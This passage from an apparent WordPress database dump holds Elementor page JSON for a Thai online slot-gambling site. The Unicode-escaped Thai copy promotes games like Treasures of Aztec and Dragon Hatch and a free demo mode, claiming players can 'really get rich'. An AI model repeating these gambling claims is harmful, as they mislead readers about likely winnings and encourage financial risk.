\\u0e20\\u0e32\\u0e1e\\u0e01\\u0e23\\u0e32\\u0e1f\\u0e34\\u0e01\\u0e2a\\u0e44\\u0e15\\u0e25\\u0e4c\\u0e08\\u0e35\\u0e19\\u0e42\\u0e1a\\u0e23\\u0e32\\u0e13\\u0e14\\u0e39\\u0e41\\u0e1e\\u0e07\\u0e41\\u0e15\\u0e48\\u0e40\\u0e25\\u0e48\\u0e19\\u0e07\\u0e48\\u0e32\\u0e22 \\u0e08\\u0e31\\u0e07\\u0e2b\\u0e27\\u0e30\\u0e40\\u0e01\\u0e21\\u0e44\\u0e21\\u0e48\\u0e40\\u0e23\\u0e47\\u0e27\\u0e40\\u0e01\\u0e34\\u0e19\\u0e44\\u0e1b\\u0e08\\u0e36\\u0e07\\u0e40\\u0e2b\\u0e21\\u0e32\\u0e30\\u0e01\\u0e31\\u0e1a\\u0e2a\\u0e32\\u0e22\\u0e27\\u0e32\\u0e07\\u0e41\\u0e1c\\u0e19\\u0e17\\u0e35\\u0e48\\u0e0a\\u0e2d\\u0e1a\\u0e14\\u0e39\\u0e17\\u0e23\\u0e07\\u0e01\\u0e48\\u0e2d\\u0e19\\u0e40\\u0e23\\u0e48\\u0e07\\u0e23\\u0e2d\\u0e1a \\u0e04\\u0e27\\u0e32\\u0e21\\u0e40\\u0e1f\\u0e35\\u0e49\\u0e22\\u0e27\\u0e02\\u0e2d\\u0e07\\u0e40\\u0e01\\u0e21\\u0e19\\u0e35\\u0e49\\u0e04\\u0e37\\u0e2d\\u0e1f\\u0e35\\u0e40\\u0e08\\u0e2d\\u0e23\\u0e4c\\u0e15\\u0e31\\u0e27\\u0e04\\u0e39\\u0e13\\u0e17\\u0e35\\u0e48\\u0e40\\u0e1e\\u0e34\\u0e48\\u0e21\\u0e02\\u0e36\\u0e49\\u0e19\\u0e40\\u0e23\\u0e37\\u0e48\\u0e2d\\u0e22 \\u0e46 \\u0e40\\u0e21\\u0e37\\u0e48\\u0e2d\\u0e0a\\u0e19\\u0e30\\u0e15\\u0e34\\u0e14\\u0e01\\u0e31\\u0e19 \\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e01\\u0e33\\u0e44\\u0e23\\u0e1e\\u0e38\\u0e48\\u0e07\\u0e41\\u0e1a\\u0e1a\\u0e44\\u0e21\\u0e48\\u0e17\\u0e31\\u0e19\\u0e15\\u0e31\\u0e49\\u0e07\\u0e15\\u0e31\\u0e27 \\u0e43\\u0e04\\u0e23\\u0e0a\\u0e2d\\u0e1a\\u0e1f\\u0e35\\u0e25\\u0e04\\u0e48\\u0e2d\\u0e22 \\u0e46 \\u0e2a\\u0e30\\u0e2a\\u0e21\\u0e04\\u0e27\\u0e32\\u0e21\\u0e44\\u0e14\\u0e49\\u0e40\\u0e1b\\u0e23\\u0e35\\u0e22\\u0e1a\\u0e41\\u0e25\\u0e49\\u0e27\\u0e1b\\u0e34\\u0e14\\u0e08\\u0e1a\\u0e14\\u0e49\\u0e27\\u0e22\\u0e23\\u0e2d\\u0e1a\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e2b\\u0e19\\u0e31\\u0e01 \\u0e46 \\u0e08\\u0e30\\u0e2d\\u0e34\\u0e19\\u0e01\\u0e31\\u0e1a\\u0e40\\u0e01\\u0e21\\u0e19\\u0e35\\u0e49\\u0e2a\\u0e38\\u0e14\\u0e17\\u0e32\\u0e07 \\u0e40\\u0e25\\u0e48\\u0e19\\u0e40\\u0e1e\\u0e25\\u0e34\\u0e19\\u0e41\\u0e15\\u0e48\\u0e21\\u0e35\\u0e0a\\u0e31\\u0e49\\u0e19\\u0e40\\u0e0a\\u0e34\\u0e07 \\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e17\\u0e38\\u0e01\\u0e01\\u0e32\\u0e23\\u0e2b\\u0e21\\u0e38\\u0e19\\u0e44\\u0e21\\u0e48\\u0e43\\u0e0a\\u0e48\\u0e41\\u0e04\\u0e48\\u0e25\\u0e38\\u0e49\\u0e19\\u0e42\\u0e0a\\u0e04\\u0e41\\u0e15\\u0e48\\u0e04\\u0e37\\u0e2d\\u0e01\\u0e32\\u0e23\\u0e2d\\u0e48\\u0e32\\u0e19\\u0e08\\u0e31\\u0e07\\u0e2b\\u0e27\\u0e30\\u0e41\\u0e25\\u0e30\\u0e40\\u0e25\\u0e37\\u0e2d\\u0e01\\u0e2a\\u0e1b\\u0e35\\u0e14\\u0e43\\u0e2b\\u0e49\\u0e40\\u0e02\\u0e49\\u0e32\\u0e01\\u0e31\\u0e1a\\u0e2a\\u0e44\\u0e15\\u0e25\\u0e4c\\u0e15\\u0e31\\u0e27\\u0e40\\u0e2d\\u0e07<\\/span><\\/p><h3><span style=\\\"color: #99cc00;\\\"><b>\\u0e40\\u0e01\\u0e21\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15 Treasures of Azte<\\/b><\\/span><\\/h3><p><span style=\\\"font-weight: 400;\\\">Treasures of Aztec \\u0e21\\u0e32\\u0e43\\u0e19\\u0e18\\u0e35\\u0e21\\u0e2d\\u0e32\\u0e23\\u0e22\\u0e18\\u0e23\\u0e23\\u0e21\\u0e25\\u0e36\\u0e01\\u0e25\\u0e31\\u0e1a\\u0e17\\u0e35\\u0e48\\u0e40\\u0e15\\u0e47\\u0e21\\u0e44\\u0e1b\\u0e14\\u0e49\\u0e27\\u0e22\\u0e2a\\u0e35\\u0e17\\u0e2d\\u0e07\\u0e41\\u0e25\\u0e30\\u0e1e\\u0e25\\u0e31\\u0e07\\u0e41\\u0e2b\\u0e48\\u0e07\\u0e02\\u0e38\\u0e21\\u0e17\\u0e23\\u0e31\\u0e1e\\u0e22\\u0e4c \\u0e08\\u0e38\\u0e14\\u0e02\\u0e32\\u0e22\\u0e04\\u0e37\\u0e2d\\u0e23\\u0e39\\u0e1b\\u0e41\\u0e1a\\u0e1a\\u0e40\\u0e01\\u0e21\\u0e40\\u0e23\\u0e35\\u0e22\\u0e1a\\u0e07\\u0e48\\u0e32\\u0e22\\u0e41\\u0e15\\u0e48\\u0e0b\\u0e48\\u0e2d\\u0e19\\u0e42\\u0e2d\\u0e01\\u0e32\\u0e2a\\u0e41\\u0e15\\u0e01\\u0e2b\\u0e19\\u0e31\\u0e01\\u0e44\\u0e27\\u0e49\\u0e17\\u0e38\\u0e01\\u0e15\\u0e32 \\u0e2a\\u0e31\\u0e0d\\u0e25\\u0e31\\u0e01\\u0e29\\u0e13\\u0e4c\\u0e21\\u0e39\\u0e25\\u0e04\\u0e48\\u0e32\\u0e2a\\u0e39\\u0e07\\u0e21\\u0e35\\u0e1a\\u0e17\\u0e1a\\u0e32\\u0e17\\u0e0a\\u0e31\\u0e14\\u0e40\\u0e08\\u0e19 \\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e2a\\u0e32\\u0e22\\u0e25\\u0e38\\u0e49\\u0e19\\u0e41\\u0e08\\u0e47\\u0e01\\u0e1e\\u0e2d\\u0e15\\u0e23\\u0e39\\u0e49\\u0e2a\\u0e36\\u0e01\\u0e2b\\u0e31\\u0e27\\u0e43\\u0e08\\u0e40\\u0e15\\u0e49\\u0e19\\u0e41\\u0e23\\u0e07\\u0e17\\u0e38\\u0e01\\u0e04\\u0e23\\u0e31\\u0e49\\u0e07\\u0e17\\u0e35\\u0e48\\u0e27\\u0e07\\u0e25\\u0e49\\u0e2d\\u0e2b\\u0e22\\u0e38\\u0e14 \\u0e04\\u0e27\\u0e32\\u0e21\\u0e2a\\u0e19\\u0e38\\u0e01\\u0e2d\\u0e22\\u0e39\\u0e48\\u0e17\\u0e35\\u0e48\\u0e01\\u0e32\\u0e23\\u0e40\\u0e02\\u0e49\\u0e32\\u0e43\\u0e08\\u0e08\\u0e31\\u0e07\\u0e2b\\u0e27\\u0e30\\u0e02\\u0e2d\\u0e07\\u0e40\\u0e01\\u0e21 \\u0e40\\u0e1e\\u0e23\\u0e32\\u0e30\\u0e1a\\u0e32\\u0e07\\u0e23\\u0e2d\\u0e1a\\u0e2d\\u0e32\\u0e08\\u0e19\\u0e34\\u0e48\\u0e07\\u0e41\\u0e15\\u0e48\\u0e1e\\u0e2d\\u0e40\\u0e02\\u0e49\\u0e32\\u0e42\\u0e2b\\u0e21\\u0e14\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e41\\u0e25\\u0e49\\u0e27\\u0e2a\\u0e32\\u0e21\\u0e32\\u0e23\\u0e16\\u0e1e\\u0e38\\u0e48\\u0e07\\u0e22\\u0e32\\u0e27\\u0e44\\u0e14\\u0e49\\u0e41\\u0e1a\\u0e1a\\u0e2a\\u0e30\\u0e43\\u0e08 \\u0e40\\u0e2b\\u0e21\\u0e32\\u0e30\\u0e01\\u0e31\\u0e1a\\u0e04\\u0e19\\u0e17\\u0e35\\u0e48\\u0e0a\\u0e2d\\u0e1a\\u0e04\\u0e27\\u0e32\\u0e21\\u0e15\\u0e37\\u0e48\\u0e19\\u0e40\\u0e15\\u0e49\\u0e19\\u0e2a\\u0e44\\u0e15\\u0e25\\u0e4c\\u0e23\\u0e27\\u0e14\\u0e40\\u0e23\\u0e47\\u0e27\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e04\\u0e34\\u0e14\\u0e0b\\u0e31\\u0e1a\\u0e0b\\u0e49\\u0e2d\\u0e19 \\u0e20\\u0e32\\u0e1e\\u0e2a\\u0e27\\u0e22\\u0e04\\u0e21\\u0e0a\\u0e31\\u0e14 \\u0e40\\u0e2d\\u0e1f\\u0e40\\u0e1f\\u0e01\\u0e15\\u0e4c\\u0e08\\u0e31\\u0e14\\u0e40\\u0e15\\u0e47\\u0e21 \\u0e0a\\u0e48\\u0e27\\u0e22\\u0e40\\u0e1e\\u0e34\\u0e48\\u0e21\\u0e2d\\u0e32\\u0e23\\u0e21\\u0e13\\u0e4c\\u0e23\\u0e48\\u0e27\\u0e21\\u0e17\\u0e38\\u0e01\\u0e04\\u0e23\\u0e31\\u0e49\\u0e07\\u0e17\\u0e35\\u0e48\\u0e0a\\u0e19\\u0e30 \\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e01\\u0e32\\u0e23\\u0e1b\\u0e31\\u0e48\\u0e19\\u0e41\\u0e15\\u0e48\\u0e25\\u0e30\\u0e23\\u0e2d\\u0e1a\\u0e21\\u0e35\\u0e40\\u0e2a\\u0e19\\u0e48\\u0e2b\\u0e4c\\u0e40\\u0e09\\u0e1e\\u0e32\\u0e30\\u0e15\\u0e31\\u0e27\\u0e41\\u0e25\\u0e30\\u0e2a\\u0e23\\u0e49\\u0e32\\u0e07\\u0e04\\u0e27\\u0e32\\u0e21\\u0e23\\u0e39\\u0e49\\u0e2a\\u0e36\\u0e01\\u0e2d\\u0e22\\u0e32\\u0e01\\u0e01\\u0e14\\u0e15\\u0e48\\u0e2d\\u0e41\\u0e1a\\u0e1a\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e1d\\u0e37\\u0e19\\u0e43\\u0e08<\\/span><\\/p><h3><span style=\\\"color: #99cc00;\\\"><b>\\u0e40\\u0e01\\u0e21\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15 Dragon Hatc<\\/b><\\/span><\\/h3><p><span style=\\\"font-weight: 400;\\\">Dragon Hatch \\u0e04\\u0e37\\u0e2d\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e2a\\u0e32\\u0e22\\u0e41\\u0e1f\\u0e19\\u0e15\\u0e32\\u0e0b\\u0e35\\u0e17\\u0e35\\u0e48\\u0e2b\\u0e22\\u0e34\\u0e1a\\u0e40\\u0e23\\u0e37\\u0e48\\u0e2d\\u0e07\\u0e23\\u0e32\\u0e27\\u0e44\\u0e02\\u0e48\\u0e21\\u0e31\\u0e07\\u0e01\\u0e23\\u0e21\\u0e32\\u0e40\\u0e15\\u0e34\\u0e21\\u0e04\\u0e27\\u0e32\\u0e21\\u0e21\\u0e31\\u0e19\\u0e41\\u0e1a\\u0e1a\\u0e08\\u0e31\\u0e14\\u0e40\\u0e15\\u0e47\\u0e21 \\u0e08\\u0e38\\u0e14\\u0e40\\u0e14\\u0e48\\u0e19\\u0e04\\u0e37\\u0e2d\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e08\\u0e48\\u0e32\\u0e22\\u0e23\\u0e32\\u0e07\\u0e27\\u0e31\\u0e25\\u0e17\\u0e35\\u0e48\\u0e40\\u0e1b\\u0e34\\u0e14\\u0e17\\u0e32\\u0e07\\u0e43\\u0e2b\\u0e49\\u0e25\\u0e38\\u0e49\\u0e19\\u0e23\\u0e31\\u0e27\\u0e43\\u0e19\\u0e0a\\u0e48\\u0e27\\u0e07\\u0e1f\\u0e23\\u0e35\\u0e2a\\u0e1b\\u0e34\\u0e19 \\u0e2a\\u0e31\\u0e0d\\u0e25\\u0e31\\u0e01\\u0e29\\u0e13\\u0e4c\\u0e44\\u0e02\\u0e48\\u0e21\\u0e31\\u0e07\\u0e01\\u0e23\\u0e41\\u0e15\\u0e48\\u0e25\\u0e30\\u0e43\\u0e1a\\u0e21\\u0e35\\u0e21\\u0e39\\u0e25\\u0e04\\u0e48\\u0e32\\u0e41\\u0e15\\u0e01\\u0e15\\u0e48\\u0e32\\u0e07\\u0e01\\u0e31\\u0e19 \\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e17\\u0e38\\u0e01\\u0e01\\u0e32\\u0e23\\u0e2b\\u0e21\\u0e38\\u0e19\\u0e40\\u0e15\\u0e47\\u0e21\\u0e44\\u0e1b\\u0e14\\u0e49\\u0e27\\u0e22\\u0e04\\u0e27\\u0e32\\u0e21\\u0e04\\u0e32\\u0e14\\u0e2b\\u0e27\\u0e31\\u0e07 \\u0e04\\u0e27\\u0e32\\u0e21\\u0e40\\u0e17\\u0e48\\u0e02\\u0e2d\\u0e07\\u0e40\\u0e01\\u0e21\\u0e19\\u0e35\\u0e49\\u0e04\\u0e37\\u0e2d\\u0e40\\u0e2d\\u0e1f\\u0e40\\u0e1f\\u0e01\\u0e15\\u0e4c\\u0e44\\u0e1f\\u0e41\\u0e25\\u0e30\\u0e40\\u0e2a\\u0e35\\u0e22\\u0e07\\u0e04\\u0e33\\u0e23\\u0e32\\u0e21\\u0e17\\u0e35\\u0e48\\u0e1b\\u0e25\\u0e38\\u0e01\\u0e2d\\u0e32\\u0e23\\u0e21\\u0e13\\u0e4c\\u0e19\\u0e31\\u0e01\\u0e25\\u0e48\\u0e32\\u0e43\\u0e2b\\u0e49\\u0e15\\u0e37\\u0e48\\u0e19\\u0e15\\u0e31\\u0e27\\u0e15\\u0e25\\u0e2d\\u0e14\\u0e40\\u0e27\\u0e25\\u0e32 \\u0e43\\u0e04\\u0e23\\u0e0a\\u0e2d\\u0e1a\\u0e40\\u0e01\\u0e21\\u0e17\\u0e35\\u0e48\\u0e21\\u0e35\\u0e08\\u0e31\\u0e07\\u0e2b\\u0e27\\u0e30\\u0e1e\\u0e35\\u0e04\\u0e0a\\u0e31\\u0e14\\u0e40\\u0e08\\u0e19\\u0e41\\u0e25\\u0e30\\u0e21\\u0e35\\u0e42\\u0e2d\\u0e01\\u0e32\\u0e2a\\u0e1e\\u0e25\\u0e34\\u0e01\\u0e40\\u0e01\\u0e21\\u0e43\\u0e19\\u0e23\\u0e2d\\u0e1a\\u0e40\\u0e14\\u0e35\\u0e22\\u0e27\\u0e08\\u0e30\\u0e16\\u0e39\\u0e01\\u0e43\\u0e08\\u0e41\\u0e19\\u0e48\\u0e19\\u0e2d\\u0e19 \\u0e40\\u0e25\\u0e48\\u0e19\\u0e07\\u0e48\\u0e32\\u0e22\\u0e44\\u0e21\\u0e48\\u0e0b\\u0e31\\u0e1a\\u0e0b\\u0e49\\u0e2d\\u0e19\\u0e41\\u0e15\\u0e48\\u0e43\\u0e2b\\u0e49\\u0e1f\\u0e35\\u0e25\\u0e40\\u0e2b\\u0e21\\u0e37\\u0e2d\\u0e19\\u0e01\\u0e33\\u0e25\\u0e31\\u0e07\\u0e1c\\u0e08\\u0e0d\\u0e20\\u0e31\\u0e22\\u0e43\\u0e19\\u0e14\\u0e34\\u0e19\\u0e41\\u0e14\\u0e19\\u0e21\\u0e31\\u0e07\\u0e01\\u0e23 \\u0e17\\u0e38\\u0e01\\u0e04\\u0e23\\u0e31\\u0e49\\u0e07\\u0e17\\u0e35\\u0e48\\u0e40\\u0e02\\u0e49\\u0e32\\u0e2a\\u0e39\\u0e48\\u0e42\\u0e2b\\u0e21\\u0e14\\u0e1e\\u0e34\\u0e40\\u0e28\\u0e29\\u0e04\\u0e37\\u0e2d\\u0e0a\\u0e48\\u0e27\\u0e07\\u0e40\\u0e27\\u0e25\\u0e32\\u0e17\\u0e35\\u0e48\\u0e25\\u0e38\\u0e49\\u0e19\\u0e2b\\u0e19\\u0e31\\u0e01\\u0e41\\u0e25\\u0e30\\u0e21\\u0e35\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e4c\\u0e40\\u0e2b\\u0e47\\u0e19\\u0e22\\u0e2d\\u0e14\\u0e1e\\u0e38\\u0e48\\u0e07\\u0e41\\u0e1a\\u0e1a\\u0e40\\u0e01\\u0e34\\u0e19\\u0e04\\u0e32\\u0e14 \\u0e40\\u0e1b\\u0e47\\u0e19\\u0e2d\\u0e35\\u0e01\\u0e40\\u0e01\\u0e21\\u0e17\\u0e35\\u0e48\\u0e15\\u0e2d\\u0e1a\\u0e42\\u0e08\\u0e17\\u0e22\\u0e4c\\u0e2a\\u0e32\\u0e22\\u0e1b\\u0e31\\u0e48\\u0e19\\u0e22\\u0e38\\u0e04\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e17\\u0e35\\u0e48\\u0e2d\\u0e22\\u0e32\\u0e01\\u0e44\\u0e14\\u0e49\\u0e17\\u0e31\\u0e49\\u0e07\\u0e04\\u0e27\\u0e32\\u0e21\\u0e21\\u0e31\\u0e19\\u0e41\\u0e25\\u0e30\\u0e42\\u0e2d\\u0e01\\u0e32\\u0e2a\\u0e17\\u0e33\\u0e01\\u0e33\\u0e44\\u0e23\\u0e43\\u0e19\\u0e23\\u0e2d\\u0e1a\\u0e40\\u0e14\\u0e35\\u0e22\\u0e27<\\/span><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"c0fa625\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2026\\/02\\/Character-2-.webp\",\"id\":288,\"size\":\"\",\"alt\":\"yok789\",\"source\":\"library\"},\"image_size\":\"full\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"49411b8\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u0e1b\\u0e31\\u0e48\\u0e19 \\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15 \\u0e1f\\u0e23\\u0e35 \\u0e17\\u0e14\\u0e25\\u0e2d\\u0e07 \\u0e23\\u0e27\\u0e22\\u0e44\\u0e14\\u0e49\\u0e08\\u0e23\\u0e34\\u0e07 \\u0e40\\u0e25\\u0e48\\u0e19\\u0e1f\\u0e23\\u0e35 YOK789 \\u0e44\\u0e14\\u0e49\\u0e17\\u0e38\\u0e01\\u0e04\\u0e48\\u0e32\\u0e22\\u0e44\\u0e21\\u0e48\\u0e08\\u0e33\\u0e01\\u0e31\\u0e14 \",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"035032d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><span style=\\\"font-weight: 400;\\\">\\u0e2a\\u0e32\\u0e22\\u0e2d\\u0e22\\u0e32\\u0e01\\u0e25\\u0e2d\\u0e07\\u0e01\\u0e48\\u0e2d\\u0e19\\u0e25\\u0e38\\u0e22\\u0e08\\u0e23\\u0e34\\u0e07\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e16\\u0e39\\u0e01\\u0e43\\u0e08\\u0e42\\u0e2b\\u0e21\\u0e14 <strong>\\u0e1b\\u0e31\\u0e48\\u0e19 \\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15 \\u0e1f\\u0e23\\u0e35 \\u0e17\\u0e14\\u0e25\\u0e2d\\u0e07<\\/strong><\\/span><span style=\\\"font-weight: 400;\\\">\\u00a0\\u0e17\\u0e35\\u0e48\\u0e40\\u0e1b\\u0e34\\u0e14\\u0e43\\u0e2b\\u0e49\\u0e17\\u0e14\\u0e25\\u0e2d\\u0e07\\u0e40\\u0e25\\u0e48\\u0e19\\u0e44\\u0e14\\u0e49\\u0e41\\u0e1a\\u0e1a\\u0e44\\u0e21\\u0e48\\u0e08\\u0e33\\u0e01\\u0e31\\u0e14\\u0e04\\u0e48\\u0e32\\u0e22 \\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e40\\u0e15\\u0e34\\u0e21\\u0e01\\u0e47\\u0e40\\u0e02\\u0e49\\u0e32\\u0e44\\u0e1b\\u0e2a\\u0e31\\u0e21\\u0e1c\\u0e31\\u0e2a\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e40\\u0e01\\u0e21\\u0e44\\u0e14\\u0e49\\u0e04\\u0e23\\u0e1a\\u0e17\\u0e38\\u0e01\\u0e1f\\u0e35\\u0e40\\u0e08\\u0e2d\\u0e23\\u0e4c \\u0e08\\u0e30\\u0e25\\u0e2d\\u0e07\\u0e08\\u0e31\\u0e1a\\u0e08\\u0e31\\u0e07\\u0e2b\\u0e27\\u0e30\\u0e41\\u0e15\\u0e01 \\u0e14\\u0e39\\u0e23\\u0e2d\\u0e1a\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e40\\u0e17\\u0e2a\\u0e2a\\u0e44\\u0e15\\u0e25\\u0e4c\\u0e40\\u0e01\\u0e21\\u0e44\\u0e2b\\u0e19\\u0e40\\u0e2b\\u0e21\\u0e32\\u0e30\\u0e01\\u0e31\\u0e1a\\u0e15\\u0e31\\u0e27\\u0e40\\u0e2d\\u0e07\\u0e01\\u0e47\\u0e17\\u0e33\\u0e44\\u0e14\\u0e49\\u0e40\\u0e15\\u0e47\\u0e21\\u0e17\\u0e35\\u0e48 \\u0e04\\u0e27\\u0e32\\u0e21\\u0e14\\u0e35\\u0e07\\u0e32\\u0e21\\u0e04\\u0e37\\u0e2d\\u0e43\\u0e2b\\u0e49\\u0e1b\\u0e23\\u0e30\\u0e2a\\u0e1a\\u0e01\\u0e32\\u0e23\\u0e13\\u0e4c\\u0e40\\u0e2b\\u0e21\\u0e37\\u0e2d\\u0e19\\u0e40\\u0e25\\u0e48\\u0e19\\u0e40\\u0e07\\u0e34\\u0e19\\u0e08\\u0e23\\u0e34\\u0e07 \\u0e20\\u0e32\\u0e1e\\u0e25\\u0e37\\u0e48\\u0e19 \\u0e40\\u0e2d\\u0e1f\\u0e40\\u0e1f\\u0e01\\u0e15\\u0e4c\\u0e04\\u0e23\\u0e1a \\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e27\\u0e32\\u0e07\\u0e41\\u0e1c\\u0e19\\u0e01\\u0e48\\u0e2d\\u0e19\\u0e25\\u0e07\\u0e2a\\u0e19\\u0e32\\u0e21\\u0e08\\u0e23\\u0e34\\u0e07\\u0e44\\u0e14\\u0e49\\u0e41\\u0e1a\\u0e1a\\u0e21\\u0e37\\u0e2d\\u0e42\\u0e1b\\u0e23 \\u0e43\\u0e04\\u0e23\\u0e2d\\u0e22\\u0e32\\u0e01\\u0e1d\\u0e36\\u0e01\\u0e2d\\u0e48\\u0e32\\u0e19\\u0e40\\u0e01\\u0e21\\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e2b\\u0e32\\u0e2a\\u0e39\\u0e15\\u0e23\\u0e1b\\u0e31\\u0e48\\u0e19\\u0e17\\u0e35\\u0e48\\u0e40\\u0e02\\u0e49\\u0e32\\u0e21\\u0e37\\u0e2d\\u0e2a\\u0e32\\u0e21\\u0e32\\u0e23\\u0e16\\u0e43\\u0e0a\\u0e49\\u0e42\\u0e2b\\u0e21\\u0e14\\u0e19\\u0e35\\u0e49\\u0e1b\\u0e31\\u0e49\\u0e19\\u0e04\\u0e27\\u0e32\\u0e21\\u0e21\\u0e31\\u0e48\\u0e19\\u0e43\\u0e08\\u0e44\\u0e14\\u0e49\\u0e2a\\u0e1a\\u0e32\\u0e22 \\u0e40\\u0e21\\u0e37\\u0e48\\u0e2d\\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e04\\u0e48\\u0e2d\\u0e22\\u0e2a\\u0e25\\u0e31\\u0e1a\\u0e21\\u0e32\\u0e40\\u0e25\\u0e48\\u0e19\\u0e08\\u0e23\\u0e34\\u0e07\\u0e01\\u0e47\\u0e40\\u0e14\\u0e34\\u0e19\\u0e40\\u0e01\\u0e21\\u0e44\\u0e14\\u0e49\\u0e40\\u0e09\\u0e35\\u0e22\\u0e1a\\u0e01\\u0e27\\u0e48\\u0e32\\u0e40\\u0e14\\u0e34\\u0e21 \\u0e40\\u0e1b\\u0e47\\u0e19\\u0e1e\\u0e37\\u0e49\\u0e19\\u0e17\\u0e35\\u0e48\\u0e43\\u0e2b\\u0e49\\u0e17\\u0e31\\u0e49\\u0e07\\u0e21\\u0e37\\u0e2d\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e41\\u0e25\\u0e30\\u0e2a\\u0e32\\u0e22\\u0e40\\u0e01\\u0e4b\\u0e32\\u0e44\\u0e14\\u0e49\\u0e1e\\u0e31\\u0e12\\u0e19\\u0e32\\u0e08\\u0e31\\u0e07\\u0e2b\\u0e27\\u0e30\\u0e15\\u0e31\\u0e27\\u0e40\\u0e2d\\u0e07\\u0e42\\u0e14\\u0e22\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e40\\u0e2a\\u0e35\\u0e48\\u0e22\\u0e07\\u0e17\\u0e38\\u0e19\\u0e15\\u0e31\\u0e49\\u0e07\\u0e41\\u0e15\\u0e48\\u0e23\\u0e2d\\u0e1a\\u0e41\\u0e23\\u0e01 \\u0e40\\u0e1b\\u0e34\\u0e14\\u0e17\\u0e32\\u0e07\\u0e2a\\u0e39\\u0e48\\u0e42\\u0e2d\\u0e01\\u0e32\\u0e2a\\u0e23\\u0e27\\u0e22\\u0e14\\u0e49\\u0e27\\u0e22\\u0e01\\u0e32\\u0e23\\u0e40\\u0e23\\u0e34\\u0e48\\u0e21\\u0e08\\u0e32\\u0e01\\u0e28\\u0e39\\u0e19\\u0e22\\u0e4c\\u0e41\\u0e1a\\u0e1a\\u0e21\\u0e35\\u0e0a\\u0e31\\u0e49\\u0e19\\u0e40\\u0e0a\\u0e34\\u0e07<\\/span><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(2814,384,'_thumbnail_id','371'),(2815,384,'_elementor_edit_mode','builder'),(2816,384,'_elementor_template_type','wp-page'),(2817,384,'_elementor_version','3.35.5'),(2818,384,'_elementor_pro_version','3.32.3'),(2819,384,'_wp_page_template','default'),(2820,384,'_elementor_page_settings','a:1:{s:10:\"hide_title\";s:3:\"yes\";}'),(2821,384,'_elementor_data','[{\"id\":\"e34294a\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"margin\":{\"unit\":\"px\",\"top\":\"10\",\"right\":0,\"bottom\":\"10\",\"left\":0,\"isLinked\":true}},\"elements\":[{\"id\":\"71011f2\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"e6e2e32\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2026\\/02\\/Slot-NO1-AMB18.webp\",\"id\":363,\"size\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\",\"width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"image_box_shadow_box_shadow\":{\"horizontal\":-5,\"vertical\":5,\"blur\":10,\"spread\":5,\"color\":\"rgba(241.14765625, 7.867606108292297, 7.867606108292297, 0.5)\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"ac7884b\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"f319719\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2026\\/02\\/True-wallet-AMB18.webp\",\"id\":365,\"size\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\",\"width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"image_box_shadow_box_shadow\":{\"horizontal\":5,\"vertical\":5,\"blur\":10,\"spread\":5,\"color\":\"rgba(241.14765625, 7.867606108292297, 7.867606108292297, 0.5)\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"6356635\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"8cd2aba\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"62ee80e\",\"elType\":\"widget\",\"settings\":{\"title\":\"AMB18 \\u0e40\\u0e27\\u0e47\\u0e1a\\u0e22\\u0e2d\\u0e14\\u0e19\\u0e34\\u0e22\\u0e21 \\u0e40\\u0e27\\u0e47\\u0e1a\\u0e14\\u0e31\\u0e07\\u0e25\\u0e34\\u0e02\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e4c\\u0e41\\u0e17\\u0e49 